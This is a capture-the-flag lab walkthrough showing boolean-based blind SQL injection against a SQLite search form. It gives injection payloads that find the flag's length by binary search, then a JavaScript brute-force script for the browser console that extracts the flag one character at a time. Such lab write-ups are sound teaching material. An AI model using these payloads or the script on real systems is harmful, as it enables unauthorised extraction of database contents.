Obtain flag from table flag field flag in Sqlite DBMS.
| ID | Name | Age | Weight |
|---|---|---|---|
| 1 | Angela Howard | 68 | 44 |
| 2 | Stephen Torres | 51 | 51 |
| 3 | Jeremy Fleming | 46 | 54 |
1. Enter different payloads, for example:
From the output we can understand that this is the boolean based blind sql injection.
Since we know that flag is in the flag table and we know the sql injection type, we can do perform our attack. To do so we need to find a lenght of flag first.
2. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 10 -- and observe the output.
Explanation: in query SELECT 1 FROM capybaras WHERE name ='' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 10 -- :
If the LENGTH of flag is greater that 10 we should get "Capybara exist!" otherwise "No matches". Now we need to find the exact size. We can do it by trying every possible lenght from 0 to infnite with = operator, or by performing binary search with <,> and = operators.
3. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) < 30 -- send request and observe the output.
We should get "Capybara exist!" and our flag is less than 30 chars
4. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 20 -- send request and observe the output.
We should get "Capybara exist!" and our flag is greater than 20 chars
5. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 25 -- send request and observe the output.
We should get "No matches" and our flag is less than 26 chars
6. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 23 -- send request and observe the output.
We should get "Capybara exist!" and our flag is greater than 23 chars
7. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) > 24 -- send request and observe the output.
We should get "Capybara exist!" and our flag is greater than 24 chars. Since only possible value left is 25, we will check if 25 if our desired lenght.
8. Enter ' OR LENGTH((SELECT flag FROM flag LIMIT 1)) = 25 -- send request and observe the output.
We should get "Capybara exist!" and our flag is equals to 25 chars
9. Now ne know the lenght of the flag, and we need to iterate through all possible values for each letter.
The query to do so will be like this' or SUBSTR((SELECT flag FROM flag limit 1), 1, 1) = 'f' --
Explanation: in query SELECT 1 FROM capybaras WHERE name ='' or SUBSTR((SELECT flag FROM flag limit 1), 1, 1) = 'f' --:
Lets automate the process of bruteforcing each charecter of flag. The following code sends every possible chars one by one for each position of the flag, untill the responci will be true.
async function bruteForceSQLInjection(baseUrl, paramName, payloadTemplate, charset, maxLength) {
let result = '';
for (let i = 1; i <= maxLength; i++) {
for (let char of charset) {
const payload = payloadTemplate.replace('{index}', i).replace('{char}', char);
const body = new URLSearchParams();
body.append(paramName, payload);
try {
const response = await fetch(baseUrl, {
method: 'POST',
body: body,
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
}
});
const data = await response.json();
if (data.result === "Capybara exist!") {
result += char;
console.log('Found character:', char);
break;
}
} catch (error) {
console.error('Error in request:', error);
}
}
}
console.log('Extracted string:', result);
}
bruteForceSQLInjection(
'/', // URL
'search_query', // Post parameter name
"' OR SUBSTR((SELECT flag FROM flag), {index}, 1) = '{char}'--", // Payload template
'abcdefghijklmnopqrstuvwxyz}_{0123456789', // Character set to iterate over
25 // Length of the string to brute force
);
10. Copy and paste this code to browser console and it should output the flag. Edit settings on the bottom if its not working as expected